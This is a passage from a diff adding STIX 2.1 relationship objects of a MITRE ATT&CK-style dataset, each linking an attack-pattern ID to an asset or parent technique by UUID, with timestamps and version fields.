"x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c23e67ea-065f-4bb5-8339-006c90afa106", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--70e52b04-2a0c-4cea-9d18-7149f1df9dc5", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c255282e-a815-4e68-b124-01ee62b05f02", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c261bd60-7d04-4379-a095-ee88e8769433", + "created": "2024-06-26T14:37:32.340Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:37:32.340Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2669ec0-3284-491d-80cd-d9ef27aa65f1", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34e793de-0274-4982-9c1a-246ed1c19dee", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c27158a8-9f3b-4ee8-a89d-c61131390469", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c27b5db9-1522-4140-94ba-c15956258882", + "created": "2024-06-26T19:25:30.406Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:25:30.406Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c27e676e-1ac0-4ec8-bf9d-f540969c6b6f", + "created": "2023-09-29T17:59:54.204Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:59:54.204Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c29c29c6-09ba-49ac-af59-4fe717a7f93e", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2a813a1-8aa3-4b9b-ac24-52ddd436a702", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2c3b0c5-4ce7-4940-bda3-f5e901fb3433", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2e18006-9caf-494c-9d41-4a4ef5b3bf78", + "created": "2020-02-05T16:16:08.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e", + "target_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2e746ac-f2b9-4e60-b065-2502238ca6db", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2f85446-52ef-4446-a5e4-5a6b691156ec", + "created": "2020-10-19T16:48:08.551Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4ffc1794-ec3b-45be-9e52-42dbcb2af2de", + "target_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c2fc4ab7-303c-4359-9504-c55e94ea9aab", + "created": "2020-11-05T16:01:29.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c327c31e-ea3f-41fe-9542-5ff654fd128f", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c32db719-3a69-4b6f-84b2-0415b0c3f546", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3499466-50f5-45fb-9fc0-14030e01822f", + "created": "2022-06-15T18:00:04.357Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-06-15T18:00:04.357Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c37f097a-9698-412f-9e96-4d350bcd2790", + "created": "2023-09-29T16:44:26.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:44:26.728Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c39be68a-e208-47ac-a7be-6eb6e84d6608", + "created": "2023-09-29T18:49:14.639Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:49:14.639Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3c576e2-dc2f-48ce-863a-9c1db28a0708", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3d30e12-d4e1-468d-9142-3e925c38658e", + "created": "2020-03-15T16:13:46.278Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3e405f9-6dd9-42bd-b1e4-09b7ec64bd7f", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3ea656f-15af-433b-ae99-8f0ce35b5848", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3ebbf55-0a0d-493c-9686-3e9d9ecc62ba", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3f69f6e-2e87-4530-80a1-99d6574b51ff", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c3fd57c6-e2aa-4842-a553-fe5195ec2978", + "created": "2024-06-26T13:49:13.071Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:49:13.071Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c403ba54-aa72-4175-9235-a5199cf06534", + "created": "2024-06-26T14:30:05.088Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:30:05.088Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4161c29-5e43-4be0-a2d9-60e3bd6cf80b", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c41d20c8-b99e-4de8-a0e5-3e0ef3b4275b", + "created": "2023-10-02T20:21:06.420Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:21:06.420Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4308d65-4fd9-40c7-a501-4f43f9585b4a", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c439e5ac-a268-4b4c-b549-10c52b80222b", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c43c356a-f24d-4827-a216-7ff4b40307a4", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c465ab03-3a32-46af-80d1-57d8ef252445", + "created": "2024-06-27T08:55:56.076Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:55:56.076Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4718fa2-2592-44b0-87d0-f866c118a779", + "created": "2023-09-29T18:07:09.213Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:07:09.213Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c478fbd1-1175-4355-abc2-509ee717a55d", + "created": "2024-06-27T09:38:53.008Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:38:53.008Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c49f7336-749e-483b-8873-9283a377546d", + "created": "2020-02-04T13:02:12.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4a50132-a210-4093-878d-3d6df23ed26e", + "created": "2023-09-29T17:10:09.146Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:10:09.146Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--c4af4f06-6240-47ea-8638-16ae4be09ef6", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": 